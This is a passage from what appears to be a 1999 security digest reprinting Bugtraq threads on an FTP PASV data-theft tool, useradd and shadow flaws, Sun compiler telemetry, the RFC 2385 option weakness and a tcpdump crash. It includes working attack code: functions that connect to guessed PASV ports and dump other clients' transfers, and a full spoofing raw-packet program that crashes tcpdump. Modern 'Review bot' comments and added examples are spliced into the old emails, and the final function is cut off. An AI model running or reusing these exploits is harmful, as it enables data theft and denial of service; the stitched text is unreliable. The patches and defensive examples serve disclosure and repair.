    memset(buff,0,len);
    for(i=0;i<len-1;i++)
    {
        if(recv(sd,&buff[i],1,0)<=0)
            return(0);
        if(buff[i]=='\n')
            break;
    }
    return(i+1);
}

/* Reconstructed. `port` is in network byte order from the 227 parser.
   The server gave *us* this port; with sequential allocation the next
   PASV port handed to some other client is one of the following few, so
   try port+1 .. port+NUMSOCK and dump whatever lets us connect.
   Returns the number of data connections that were dumped. */
int pizzaman32(struct in_addr ip, unsigned short port)
{
    int i, got = 0;
    unsigned short base = ntohs(port);
    for(i = 1; i <= NUMSOCK; i++)
    {
        SOCKET s;
        struct sockaddr_in sa;
        unsigned short p = (unsigned short)(base + i);
        if((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
            break;
        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;
        sa.sin_addr = ip;
        sa.sin_port = htons(p);
        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == 0)
        {
            if(FLAG_VERBOSE & gFlags)
                fprintf(stdout, "connected to PASV port %u\n", (unsigned)p);
            dumpdata((int)s, ip, htons(p));
            got++;
        }
        closesocket(s);
    }
    return got;
}

/* Prologue reconstructed: wait up to gTimeout ms on a nonblocking socket
   for the first bytes, then switch to blocking and drain the whole
   transfer into a file named after the server and port (or stdout). */
void dumpdata(int theSocket, struct in_addr ip, unsigned short port)
{
    char buff[4096];
    char aFilename[64];
    FILE *out_file = NULL;
    int char_recv = -1;
    unsigned long aFlag = 1;
    DWORD start = GetTickCount();
    sprintf(aFilename, "%s_%u.pizza", inet_ntoa(ip), (unsigned)ntohs(port));
    ioctlsocket(theSocket, FIONBIO, &aFlag);      /* nonblocking while we wait */
    while((long)(gTimeout - (GetTickCount() - start)) > 0)
    {
        char_recv = recv(theSocket, buff, sizeof(buff) - 1, 0);
        if(char_recv == 0)
            break;                                /* orderly close: done */
        if(char_recv > 0)
        {
            if(aFlag)
            {
                aFlag = 0;
                ioctlsocket(theSocket, FIONBIO, &aFlag); //block on this transfer
            }
            if(FLAG_VERBOSE & gFlags)
                fprintf(stdout, "*** Got data for %s\n", aFilename);
            if(FLAG_STDOUT & gFlags)
            {
                buff[char_recv] = '\0';
                fprintf(stdout, "%s", buff);
            }
            else
            {
                if(NULL == out_file)
                {
                    out_file = fopen(aFilename, "wb");
                }
                if(out_file)
                {
                    fwrite(buff, char_recv, 1, out_file);
                }
            }
        }
        else if(!aFlag)
            break;                                /* error on a blocking socket */
        else
            Sleep(10);                            /* WSAEWOULDBLOCK: nothing yet */
    }
    if((FLAG_VERBOSE & gFlags) && (0 == char_recv))
        fprintf(stdout, "server closed connection\n");
    if(out_file)
        fclose(out_file);
}
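The two halves of the problem the post describes, as an added example that is my code and not part of PizzaThief32: a bounds-checked parser for the 227 reply (the same h1,h2,h3,h4,p1,p2 format the tool pulls apart with strtok), and a model of the server's accept path with and without the source-address check the post says is missing. Hosts, ports and addresses below are constructed (RFC 5737 ranges) and nothing talks to a network. The address check is the fix RFC 2577 recommends, with two caveats a practitioner should keep in mind: it only distinguishes addresses, so a thief behind the same NAT or on the same multi-user host as the victim still passes it, which is why RFC 2577 also recommends random rather than sequential PASV ports; and FTP over SSH or TLS, as the post suggests, removes the problem entirely.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Parse an RFC 959 "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" reply.
   ip and port come back in host byte order. Returns 1 on success and 0
   for anything malformed: wrong code, no parenthesis, too few fields, or
   a field outside 0..255. */
int parse_pasv_reply(const char *line, uint32_t *ip, uint16_t *port)
{
    unsigned v[6];
    const char *p;
    char *end;
    int i;
    if (strncmp(line, "227", 3) != 0 || (p = strchr(line, '(')) == NULL)
        return 0;
    p++;
    for (i = 0; i < 6; i++) {
        long x = strtol(p, &end, 10);
        if (end == p || x < 0 || x > 255)
            return 0;
        v[i] = (unsigned)x;
        p = end;
        if (i < 5 && *p++ != ',')
            return 0;
    }
    if (*p != ')')
        return 0;
    *ip = ((uint32_t)v[0] << 24) | (v[1] << 16) | (v[2] << 8) | v[3];
    *port = (uint16_t)(v[4] * 256 + v[5]);
    return 1;
}

/* Single-value wrappers: port (or -1 on a bad reply) and ip (or 0). */
long pasv_port_of(const char *line)
{
    uint32_t ip; uint16_t port;
    return parse_pasv_reply(line, &ip, &port) ? (long)port : -1;
}

uint32_t pasv_ip_of(const char *line)
{
    uint32_t ip; uint16_t port;
    return parse_pasv_reply(line, &ip, &port) ? ip : 0;
}

/* One PASV listener the server has opened, remembering which control
   connection asked for it. */
struct pasv_slot {
    uint16_t port;
    uint32_t ctrl_peer;   /* address of the control connection that sent PASV */
    int claimed;
};

/* A data connection arrives on `port` from `data_peer`. With check_peer == 0
   this is the behaviour the post complains about: whoever connects first
   gets the transfer. With check_peer != 0 the server refuses a data
   connection whose source differs from the control connection's address.
   Returns the index of the slot claimed, or -1 if refused / no listener. */
int claim_pasv_slot(struct pasv_slot *slots, size_t n, uint16_t port,
                    uint32_t data_peer, int check_peer)
{
    size_t i;
    for (i = 0; i < n; i++) {
        if (slots[i].port != port || slots[i].claimed)
            continue;
        if (check_peer && slots[i].ctrl_peer != data_peer)
            return -1;
        slots[i].claimed = 1;
        return (int)i;
    }
    return -1;
}

/* Constructed scenario: the victim at 198.51.100.7 sent PASV and was given
   port 5001. The thief at 192.0.2.99 saw its own PASV reply say 5000,
   guessed 5001 from the sequential allocation, and connects first; the
   victim connects a moment later. Returns 1 if the thief gets the
   transfer, 2 if the victim does, 0 if neither. */
int who_gets_transfer(int check_peer)
{
    struct pasv_slot slots[1];
    const uint32_t victim = 0xC6336407u;  /* 198.51.100.7 */
    const uint32_t thief  = 0xC0000263u;  /* 192.0.2.99 */
    slots[0].port = 5001;
    slots[0].ctrl_peer = victim;
    slots[0].claimed = 0;
    if (claim_pasv_slot(slots, 1, 5001, thief, check_peer) == 0)
        return 1;
    if (claim_pasv_slot(slots, 1, 5001, victim, check_peer) == 0)
        return 2;
    return 0;
}
```

`who_gets_transfer(0)` reproduces the theft; `who_gets_transfer(1)` shows the same race lost by the thief once the server compares the data connection's peer with the control connection's.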
@HWA
119.0 useradd -p stores cleartext passwords / shadow-980724
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 11 Jun 1999 10:11:29 EET
From: Emils Klotins
To: BUGTRAQ@netspace.org
Subject: useradd -p stores cleartext passwords / shadow-980724
Hello.
Sorry if this is reported already. Didn't find it in Bugtraq archives nor in SuSE support db.
OS: SuSE Linux 6.1
Program: useradd
Package: shadow-980724
Problem description:
'useradd' command has an option '-p password' for specifying password to the newly added user.
(This option btw, does not appear anywhere in useradd man page)
If you specify this option along with a password, the password will be stored in /etc/shadow, but
in cleartext, creating 2 problems:
1. The password is stored in cleartext
2. It of course does not work, for upon login an encrypted version of password is expected to be in
/etc/shadow.
PS. I could agree that specifying password in command-line can be considered quite dangerous,
however, if the option is there, it should either work correctly or not be there.
Emils Klotins e-mail: emils@mail.usis.bkc.lv
Systems Manager URL: http://www.usis.bkc.lv/
USIS Riga 7 Smilsu Str., Riga LV1050, LATVIA
-------------------------------------------------------------------------------
Date: Fri, 11 Jun 1999 16:02:50 -0400
From: "Roche-Kelly, Edmund B."
To: BUGTRAQ@netspace.org
Subject: Re: useradd -p stores cleartext passwords / shadow-980724
I would think the obvious answer is that the password supplied
as an argument to -p is the encrypted password, generated
by any of the mkpasswd utilities.
I agree it's odd that it's not mentioned in the man page.
Ed
-------------------------------------------------------------------------------
Date: Fri, 11 Jun 1999 19:32:03 -0500
From: James Sneeringer
To: BUGTRAQ@netspace.org
Subject: Re: useradd -p stores cleartext passwords / shadow-980724
On Fri, 11 Jun 1999, Roche-Kelly, Edmund B. wrote:
|
| I agree it's odd that it's not mentioned in the man page.
It was added to the man page in version 19990307. SuSE needs to update
their package. The current version is 19990607, available at
ftp://piast.t19.ds.pwr.wroc.pl/pub/linux/shadow/
-James
@HWA
120.0 UID 65536 and shadow-19990307 root compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 24 May 1999 20:44:28 +0200
From: Lord Evil
To: BUGTRAQ@netspace.org
Subject: UID 65536 and shadow-19990307
Recently one of our admins installed the shadow-19990307 package.
While playing around I noticed that if a new user is created with UID 65536,
he will become root upon login. No root login will be logged, and even if
the tty isn't in /etc/securetty he will be allowed in.
I dont think this is normal behaviour :)
@HWA
121.0 big brother in your cc(!)
~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 15 Jun 1999 00:17:12 +1000
From: Darren Reed
To: BUGTRAQ@netspace.org
Subject: big brother in your cc
Whilst this isn't strictly speaking a security bug, it borders on
Sun acting in a very "big brother" manner which is frightening!
For those of you using Sun's SUNWspro C compiler package, beware!
The binaries "c89" and "cc" appear to automagically send an email
to "ut-cc@sunpro.Eng.Sun.COM" with a list of C compiler commands,
including some sort of cpu-time summary. Extract as follows:
INFO unix i86pc SunOS 5.7
cc -E
CPU-time 0.010000 0.010000
...
cc -o -Xa -O
CPU-time 0.000000 0.060000
...
cc -o -Xa -O
CPU-time 0.020000 0.050000
and so on. Setting the environment variable UT_NO_USAGE_TRACKING
seems to do the right thing but for those that wish to enable this
feature, check with strings on the available environment settings
to mediate this (search for UT_). The mail is set to originate from
"nobody" so it's unlikely you'll notice it if it fails to be delivered
unless you check your mail queue.
---------------------------------------------------------------------------
Date: Mon, 14 Jun 1999 23:33:09 +0200
From: Casper Dik
To: BUGTRAQ@netspace.org
Subject: Re: big brother in your cc
>Whilst this isn't strictly speaking a security bug, it borders on
>Sun acting in a very "big brother" manner which is frightening!
>
>For those of you using Sun's SUNWspro C compiler package, beware!
>The binaries "c89" and "cc" appear to automagically send an email
>to "ut-cc@sunpro.Eng.Sun.COM" with a list of C compiler commands,
>including some sort of cpu-time summary. Extract as follows:
>
>cc -E
(I have a strong sense of deja-vu, wasn't this discussed before on
BUGTRAQ? Ah wait, Usenet Oct '98)
This compiler "feature" only exists in the pre-FCS compilers (i.e.,
Alpha and Beta products) and other pre-FCS workshop products.
It was documented in several locations, perhaps even in the
"must read and agree to" license, but I think it was pretty prominent.
(The websites have gone now that FCS is here)
(Some older compilers inadvertently left the code in) 4.0? 4.1?
That is, unless you have a domainname set on your system that ends
in .sun.com; in that case usage tracking also happens with your FCS
compiler.
So it's not all that big brotherish as you make it out:
- for alpha/beta only
- documented how to switch off (in several places)
- the cc command lines forwarded only include the options,
not the option parameters or file name arguments.
(-DFOO becomes -D, -Lpath gives -L etc ; file.c is not listed)
Nothing sinister, just alpha/beta users helping to gather statistics
about compiler option usage. (And us internal Sun folk who get to
test drive all stuff)
Of course, we could argue whether this should be an opt-in or opt-out
thing till we're blue in the face, but let's not.
Suffices to say that I've long since disabled most outgoing mail
from my system.
Casper
---------------------------------------------------------------------------
Date: Mon, 14 Jun 1999 20:00:05 +0100
From: Alec Muffett
To: BUGTRAQ@netspace.org
Subject: Old Software (Was: Re: big brother in your cc)
[Aleph - please expedite posting this if possible. Love'n'Hugs.]
>Whilst this isn't strictly speaking a security bug, it borders on
>Sun acting in a very "big brother" manner which is frightening!
Hi Guys,
The story I am told, is:
| This is VERY OLD NEWS. This info was collected as part of the
| Workshop 5.0 Early Access and Developer Release programs. It is
| *not*, I repeat, NOT turned on in the FCS release of the product.
| When customers downloaded the Early Access and Developer Release
| products off the web they were told this info was being collected via
| the FAQ and via the web security disclosure statement on the web
| site. In addition, the FAQ told them how to turn it off if they felt
| that it was data they did not want to divulge.
|
| The Early Access and Developer Release web sites are long since
| defunct since the WS 5.0 product FCS in 2/2/99. It used to be located
| at http://access1.sun.com/workshop5.0ea.
...so, can anyone submit an instance of this happening with the non
early-access software?
- alec
---------------------------------------------------------------------------
Date: Tue, 15 Jun 1999 17:16:52 +1000
From: Darren Reed
To: BUGTRAQ@netspace.org
Subject: Re: big brother in your cc
I must admit that I'm quite embarrassed about bringing this up without
properly checking which versions, etc, had the described behaviour as
it doesn't appear in any of the FCS versions.
In some mail from Casper Dik, sie said:
>
> (I have a strong sense of deja-vu, wasn't this discussed before on
> BUGTRAQ? Ah wait, Usenet Oct '98)
>
> This compiler "feature" only exists in the pre-FCS compilers (i.e.,
> Alpha and Beta products) and other pre-FCS workshop products.
Yes, I should have checked more fully on systems I have at my
disposal.
> It was documented in several locations, perhaps even in the
> "must read and agree to" license, but I think it was pretty prominent.
And like most licenses which people need to get through to install/get
software, I (like most people) tend to just click "yes" rather than `waste'
time reading it.
Still, I'd have rather seen the email come from foo@ rather than
nobody@ (which has the effect of making it disappear via /dev/null
if an error occurs in delivery).
Darren
@HWA
122.0 TCP MD5 option problem (router DoS)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 14 Jun 1999 14:29:54 -0400
From: Craig Metz
To: BUGTRAQ@netspace.org
Subject: TCP MD5 option problem
I was implementing the RFC 2385 ("Protection of BGP Sessions via the TCP MD5
Signature Option") option in the OpenBSD stack. For those who don't know the
significance of this option, it is used to provide some level of active attack
(primarily hijacking) protection for BGP sessions on Internet core routers. One
thing I noticed about the spec is that TCP options are completely excluded from
the MAC function.
The IOS TCP implementation doesn't appear to do anything significant with
TCP options and does not send any, and so, therefore, this doesn't seem to be
a problem on those systems. However, there are several other players in the
core router space (e.g., Juniper and Torrent/Ericsson) who use 4.4BSD-derived
operating systems, and those have networking stacks which DO use TCP options.
In particular, 4.4BSD processes the TCP MSS, timestamp, and window size
options, and includes enough padding that one might also be able to shuffle
things around and slip something else in.
A possible active attack might be to sniff a TCP packet in transit and to
spoof a version of that same packet with the TCP options changed, in hopes that
the genuine packet will be dropped in transit but the spoofed one will get
through. A quick read of the BSD source indicates that a MSS option's size of
zero will be internalized, which might be one possible attack to try. Such an
attack might be able to adjust TCP parameters to "choke" the TCP connection;
it will be alive and connected, but little to no routing data would move. That
in turn could be used either as a denial of service attack or to partition
groups of routers to make other attacks harder to detect.
I haven't cooked up a real exploit for this because I don't have any of the
routers that would be affected handy in my lab, but I suppose that someone so
inclined could do so given this discussion and some time to experiment.
The (IMO) obvious fix for this problem is to use IPsec's Authentication
Header (AH) and to deprecate the TCP MD5 option. There are several freely
available and viable AH implementations for BSD (including the NRL, OpenBSD,
and KAME ones) and I believe that modern IOS has AH code in it though it's not
currently set up for protecting routing traffic. AH covers all of the TCP
header and options, as well as typically having a better MAC function (the RFC
2385 option builds a MAC by appending the key, which is possibly the weakest
way to do it).
-Craig
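The exclusion Craig describes, as an added example in Python (this is not part of the original post and not OpenBSD's implementation): it computes the RFC 2385 signature from the input the RFC's section 2.0 lists (pseudo-header, the 20-byte TCP header with the checksum taken as zero, the segment data, then the key appended), shows that a segment whose MSS option has been swapped from 1460 to 0 produces the same signature as the genuine one, and contrasts that with a keyed HMAC (RFC 2104, the construction AH uses) over the same material plus the options, which does change. The key, addresses and BGP KEEPALIVE bytes are constructed sample values.

```python
import hashlib
import hmac
import socket
import struct

# Constructed sample values for the demonstration (not from the original post).
KEY = b"bgp-shared-secret"
SRC_IP = "192.0.2.1"
DST_IP = "192.0.2.2"


def mss_option(mss):
    """TCP MSS option: kind 2, length 4, 16-bit value."""
    return struct.pack("!BBH", 2, 4, mss)


def build_tcp_header(sport, dport, seq, ack, flags, window, options=b""):
    """20-byte TCP header (checksum 0) followed by options padded to a 4-byte multiple."""
    options += b"\x00" * ((-len(options)) % 4)
    data_offset = 5 + len(options) // 4          # header length in 32-bit words
    fixed = struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                        data_offset << 4, flags, window, 0, 0)
    return fixed + options


def _pseudo_header(src, dst, segment):
    """Source, destination, zero byte, protocol, TCP length (header + data)."""
    return (socket.inet_aton(src) + socket.inet_aton(dst)
            + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(segment)))


def rfc2385_signature(src, dst, segment, key):
    """RFC 2385 section 2.0: MD5 over the pseudo-header, the TCP header
    *excluding options* with the checksum taken as zero, the data, and
    finally the key. Nothing in the option area reaches the hash."""
    fixed = bytearray(segment[:20])
    fixed[16:18] = b"\x00\x00"
    data_offset = (segment[12] >> 4) * 4
    data = segment[data_offset:]
    return hashlib.md5(_pseudo_header(src, dst, segment) + bytes(fixed) + data + key).digest()


def options_covering_mac(src, dst, segment, key):
    """Contrast: an HMAC (RFC 2104, the construction AH uses) over the
    pseudo-header and the entire segment, options included."""
    whole = bytearray(segment)
    whole[16:18] = b"\x00\x00"
    return hmac.new(key, _pseudo_header(src, dst, segment) + bytes(whole), hashlib.md5).digest()


def option_swap_demo():
    """Genuine segment carries MSS 1460; the spoofed copy carries MSS 0 with the
    same option length, so the data offset is unchanged.
    Returns (rfc2385_signatures_equal, hmac_values_equal)."""
    payload = b"\xff" * 16 + struct.pack("!HB", 19, 4)   # constructed BGP KEEPALIVE
    genuine = build_tcp_header(179, 40000, 1000, 2000, 0x18, 16384, mss_option(1460)) + payload
    spoofed = build_tcp_header(179, 40000, 1000, 2000, 0x18, 16384, mss_option(0)) + payload
    sig_same = (rfc2385_signature(SRC_IP, DST_IP, genuine, KEY)
                == rfc2385_signature(SRC_IP, DST_IP, spoofed, KEY))
    mac_same = (options_covering_mac(SRC_IP, DST_IP, genuine, KEY)
                == options_covering_mac(SRC_IP, DST_IP, spoofed, KEY))
    return sig_same, mac_same


if __name__ == "__main__":
    same_sig, same_mac = option_swap_demo()
    print("RFC 2385 signature unchanged by option swap:", same_sig)
    print("options-covering HMAC unchanged by option swap:", same_mac)
```

Only a same-length substitution is invisible to the signature: changing the option length moves the data offset, which sits inside the signed 20 bytes, and the segment length in the pseudo-header. That is why the 4.4BSD padding matters: an attacker has to work within the option space the genuine packet already carries.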
-----------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 22:33:36 -0400
From: Steven M. Bellovin
To: BUGTRAQ@netspace.org
Subject: Re: TCP MD5 option problem
In message <199906141822.SAA05311@inner.net>, Craig Metz writes:
>
> The (IMO) obvious fix for this problem is to use IPsec's Authentication
> Header (AH) and to deprecate the TCP MD5 option. There are several freely
> available and viable AH implementations for BSD (including the NRL, OpenBSD,
> and KAME ones) and I believe that modern IOS has AH code in it though it's not
> currently set up for protecting routing traffic. AH covers all of the TCP
> header and options, as well as typically having a better MAC function (the RFC
> 2385 option builds a MAC by appending the key, which is possibly the weakest
> way to do it).
The RFC 2385 scheme describes a hack that was developed precisely because
IPSEC wasn't ready, and *something* was needed to protect BGP traffic.
You're absolutely right -- no one should use it for any new work.
@HWA
123.0 tcpdump 3.4 bug? (DoS)
~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 1 Jan 1986 16:30:10 +0100
From: badi
To: BUGTRAQ@netspace.org
Subject: tcpdump 3.4 bug?
/*
tcpdump bug 3.4a? by BLADI (bladi@euskalnet.net);
On receiving an ip packet with Protocol-4 and ihl=0, tcpdump enters
an infinite loop within the procedure ip_print() from file print_ip.c
This happens because the header length (ihl) equals '0' and tcpdump
tries to print the packet
I've tried the bug on different OSes:
Linux:
 SuSE 6.x (kernels 2.0.36, 2.2.5, 2.2.9, 2.3.2, 2.3.5):
 tcpdump consumes all the system memory in less than a
 minute and hangs the system, or sometimes dies with a
 bus error
 RedHat 5.2 (kernel 2.?.?) and 6.0 (kernel 2.2.9):
 tcpdump dies with a segmentation fault and sometimes
 dumps core
 Debian (kernel 2.2.?):
 tcpdump dies with a segmentation fault and dumps core
FreeBSD: segmentation fault & core dump (thanks to: wb^3, Cagliostr)
Solaris: segmentation fault & core dump (thanks to: acpizer)
AIX: ?
HP-UX: ?
-------------------------------------------------------------
These tests have been carried out in loopback mode, given that protocol 4
won't get through the routers. It would be interesting to perform the attack
remotely in an intranet, but I do not have access to one.
------------------------------------------------------------------------------
Thanks to:
the channels:
#ayuda_irc, #dune, #linux, #networking, #nova and #seguridad_informática
from irc.irc-hispano.org
Special thanks go to:
Topo[lb],^Goku^,Yogurcito,Pixie,Void,S|r_|ce,JiJ79,Unscared etc...
Thanks to Piotr Wilkin for the rip base code ;)
And big thanks go to TeMpEsT for this translation.
------
I've found two ways of solving the problem
Solution 1
execute: tcpdump -s 24
Solution 2 Apply this little patch.
diff -r -p /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c
*** /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c Wed May 28 21:51:45 1997
--- /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c Tue Oct 27 05:35:27 1998
*************** ip_print(register const u_char *bp, regi
*** 440,446 ****
(void)printf("%s > %s: ",
ipaddr_string(&ip->ip_src),
ipaddr_string(&ip->ip_dst));
- ip_print(cp, len);
if (! vflag) {
printf(" (ipip)");
return;
--- 440,445 ----
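Review bot: deleting the `ip_print(cp, len);` call stops the recursion, but it also stops tcpdump from decoding every legitimate IP-in-IP packet: after this hunk the protocol-4 branch prints the outer `src > dst` and ` (ipip)` and never shows the inner header in either mode. The narrower fix keeps the call and refuses to recurse when the header length cannot be real, e.g. `if (ip->ip_hl < 5) { printf("bad ip header length"); return; }` immediately before `ip_print(cp, len);`, so well-formed encapsulation still decodes.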
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>     /* struct iphdr: Linux/glibc layout */
#include <arpa/inet.h>
#include <netdb.h>

/* The trigger packet: one IPv4 header with ihl = 0 and protocol 4
   (IP-in-IP), followed by a 16-byte tag string. */
struct icmp_hdr
{
 struct iphdr iph;
 char text[16];   /* 16 bytes are written below; the posted text[15] overran by one */
}
encaps;

/* Internet checksum (RFC 1071). Not used: with IP_HDRINCL the kernel
   fills in the IP header checksum itself. Kept as posted, with the
   pointer type corrected to 16-bit words. */
u_short in_cksum(u_short *ptr, int nbytes)
{
 long sum = 0;
 u_short oddbyte, answer;
 while (nbytes > 1)
 {
  sum += *ptr++;
  nbytes -= 2;
 }
 if (nbytes == 1)
 {
  oddbyte = 0;
  *((u_char *)&oddbyte) = *(u_char *)ptr;
  sum += oddbyte;
 }
 sum = (sum >> 16) + (sum & 0xffff);
 sum += (sum >> 16);
 answer = ~sum;
 return(answer);
}

/* Resolve the target name and fill in the sockaddr_in for sendto(). */
struct sockaddr_in sock_open(char *address, int prt)
{
 struct hostent *host;
 struct sockaddr_in sin;
 if ((host = gethostbyname(address)) == NULL)
 {
  perror("Unable to get host name");
  exit(-1);
 }
 bzero((char *)&sin, sizeof(sin));
 sin.sin_family = AF_INET;
 sin.sin_port = htons(prt);     /* ignored on a raw socket */
 bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
 return(sin);
}

int main(int argc, char **argv)
{
 int sock;
 int on = 1;
 struct sockaddr_in addrs;
 unsigned char packet[1204];    /* the original sent 1204 bytes; zero-fill the tail */

 printf("\t\tTCPDumper Ver 0.2 \n\t\t\tBy Bladi\n");
 if (argc < 3)
 {
  printf("Usage: %s <spoofed source address> <target host>\n", argv[0]);
  exit(-1);
 }
 /* Same 16 bytes the original stored one at a time: "BLADI TZ TO TOPO" */
 memcpy(encaps.text, "BLADI TZ TO TOPO", 16);

 sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);   /* needs root */
 if (sock < 0)
 {
  perror("socket");
  exit(-1);
 }
 if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
 {
  perror("Can't set IP_HDRINCL option on socket");
 }
 fflush(stdout);
 addrs = sock_open(argv[2], random() % 255);

 /* The malformed header: version 0, header length 0, IP-in-IP. The
    kernel rewrites tot_len and the checksum under IP_HDRINCL. */
 encaps.iph.version = 0;
 encaps.iph.ihl = 0;
 encaps.iph.frag_off = htons(0);
 encaps.iph.id = htons(0x001);
 encaps.iph.protocol = 4;
 encaps.iph.ttl = 146;
 encaps.iph.tot_len = 6574;
 encaps.iph.daddr = addrs.sin_addr.s_addr;
 encaps.iph.saddr = inet_addr(argv[1]);
 printf ("\t DuMpInG %s ---> %s \n",argv[1],argv[2]);

 memset(packet, 0, sizeof(packet));
 memcpy(packet, &encaps, sizeof(encaps));
 if (sendto(sock, packet, sizeof(packet), 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1)
 {
  if (errno != ENOBUFS) perror("sendto");
 }
 fflush(stdout);
 close(sock);
 return 0;
}
--------------------------------------------------------------------------------
Date: Thu, 17 Jun 1999 12:19:06 +0100
From: acpizer
To: BUGTRAQ@netspace.org
Subject: Re: tcpdump 3.4 bug?
The given source for killing tcpdump will only work on local networks
since routers drop the bad packet it creates, a more constructive patch for
tcpdump is listed below.
-- snip --
diff -r -p print-ip.orig.c print-ip.c
*** print-ip.orig.c Thu Jun 17 11:24:17 1999
--- print-ip.c Thu Jun 17 14:07:50 1999
*************** ip_print(register const u_char *bp, regi
*** 374,379 ****
--- 374,384 ----
(void)printf("truncated-ip %d", length);
return;
}
+
+ if (ip->ip_hl == 0) {
+ (void)printf("bad ip packet - header length = 0\n");
+ return;
+ }
hlen = ip->ip_hl * 4;
len = ntohs(ip->ip_len);
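Review bot: the guard added at line 374 should be `ip->ip_hl < 5` rather than `== 0`: the line right after it computes `hlen = ip->ip_hl * 4`, and values 1 to 4 describe a header shorter than the 20-byte minimum, which still puts every later offset inside the real header. Also, the neighbouring `truncated-ip %d` message in the same hunk is printed without a trailing newline because the caller ends the line; drop the `\n` from the new message for consistency.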
-- snip --
Cheers.
-------------------------------------------------------------------------------
"Probably you've only really grown up, when you can bear not being understood."
Marian Gold /Alphaville
--------------------------------------------------------------------------------
Date: Fri, 18 Jun 1999 13:16:33 +0300
From: Markus Peuhkuri
To: BUGTRAQ@netspace.org
Subject: Re: tcpdump 3.4 bug?
acpizer writes:
> since routers drop the bad packet it creates, a more constructive patch for
...
> + if (ip->ip_hl == 0) {
Actually, as the minimum length is 5*4 bytes that could be as
well "if (ip->ip_hl < 5) {". If it is shorter it is bad anyway.
--
Markus Peuhkuri ! Markus.Peuhkuri@hut.fi ! http://www.iki.fi/puhuri/
--------------------------------------------------------------------------------
Date: Sun, 20 Jun 1999 09:17:32 +0100
From: acpizer
To: BUGTRAQ@netspace.org
Subject: Re: tcpdump 3.4 bug? (final)
Hi again,
Thanks goes to Markus Peuhkuri for pointing out that the minimum length
of an IP packet is actually 20 bytes, (I'm useless w/o a copy of TCP/IP
Illustrated in front of me), anyway, here is a final patch, also don't
forget to run tcpdump with the -v parameter if you want to see the source
address of the offensive packet.
Are the guys at LBL reading bugtraq? (tcpdump on ftp.ee.lbl.gov isn't
updated yet...)
maybe they don't think it's a bug since routers drop the packet anyway,
how about attacking machines which run tcpdump locally on the LAN?
*** print-ip.orig.c Thu Jun 17 11:24:17 1999
--- print-ip.c Sun Jun 20 11:04:20 1999
*************** ip_print(register const u_char *bp, regi
*** 440,445 ****
--- 440,451 ----
(void)printf("%s > %s: ",
ipaddr_string(&ip->ip_src),
ipaddr_string(&ip->ip_dst));
+
+ if (ip->ip_hl < 5) {
+ (void)printf("Bad ip-in-ip encapsulation (hl < 5) Possible attack!");
+ return;
+ }
+
ip_print(cp, len);
if (! vflag) {
printf(" (ipip)");
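Review bot: this guard sits only in the protocol-4 branch, and `ip->ip_hl` here is the outer header's field, which the function has already used to compute `hlen`, `len` and `cp` and to dispatch the other protocols before reaching line 440. It prevents the endless recursion, but a header length below 5 should be rejected once, right after the `truncated-ip` check where `hlen = ip->ip_hl * 4` is computed, so the TCP, UDP and ICMP decoders see a sane offset as well as the IP-in-IP path. Keep the new message without a trailing newline, as here, since the caller ends the line.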
Cheers.
-------------------------------------------------------------------------------
"Probably you've only really grown up, when you can bear not being understood."
Marian Gold /Alphaville
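The header-length check this thread converges on, as an added example in Python (this is not tcpdump's code and not from any post above): a minimal IPv4 / IP-in-IP decoder that refuses any header whose IHL is below 5 (Markus Peuhkuri's point) before using it to locate the inner packet, shown beside the naive offset computation that never advances when IHL is 0. It goes one step beyond the thread by also capping the nesting depth, since a well-formed but deeply nested IP-in-IP stack would otherwise recurse once per layer. The MAX_NESTING value and the sample packets are assumptions constructed here; the malformed packet mirrors the posted exploit's header (IHL 0, protocol 4).

```python
import struct

IPPROTO_IPIP = 4
IPPROTO_TCP = 6
MAX_NESTING = 8    # assumed limit for this example; tcpdump has no such knob


def ip_header(ihl, proto, total_len, src=b"\x0a\x00\x00\x01", dst=b"\x0a\x00\x00\x02"):
    """20 bytes of IPv4 header carrying the given IHL field value. No option
    bytes are appended, so any IHL other than 5 describes a header that does
    not match the bytes; IHL 0 is the case from the thread."""
    ver_ihl = (4 << 4) | (ihl & 0x0F)
    return struct.pack("!BBHHHBBH4s4s", ver_ihl, 0, total_len, 1, 0, 64, proto, 0, src, dst)


def naive_next_offset(buf, off):
    """What tcpdump 3.4's ip_print did: trust IHL and step over IHL*4 bytes.
    With IHL 0 the 'inner' packet starts where the outer one did, so the
    recursive call sees the same bytes again, forever."""
    return off + (buf[off] & 0x0F) * 4


def parse_ip(buf, off=0, depth=0):
    """Hardened decoder. Returns [(protocol, header_len), ...] outermost first,
    or raises ValueError for a truncated packet, an IHL below 5 (the minimum
    20-byte header), a total length shorter than the header, or too many
    IP-in-IP levels."""
    if depth >= MAX_NESTING:
        raise ValueError("too many ip-in-ip levels (%d)" % depth)
    avail = len(buf) - off
    if avail < 20:
        raise ValueError("truncated-ip %d" % avail)
    ihl = buf[off] & 0x0F
    if ihl < 5:
        raise ValueError("bad ip packet - header length %d < 20" % (ihl * 4))
    hlen = ihl * 4
    if avail < hlen:
        raise ValueError("truncated-ip options")
    total_len = struct.unpack("!H", buf[off + 2:off + 4])[0]
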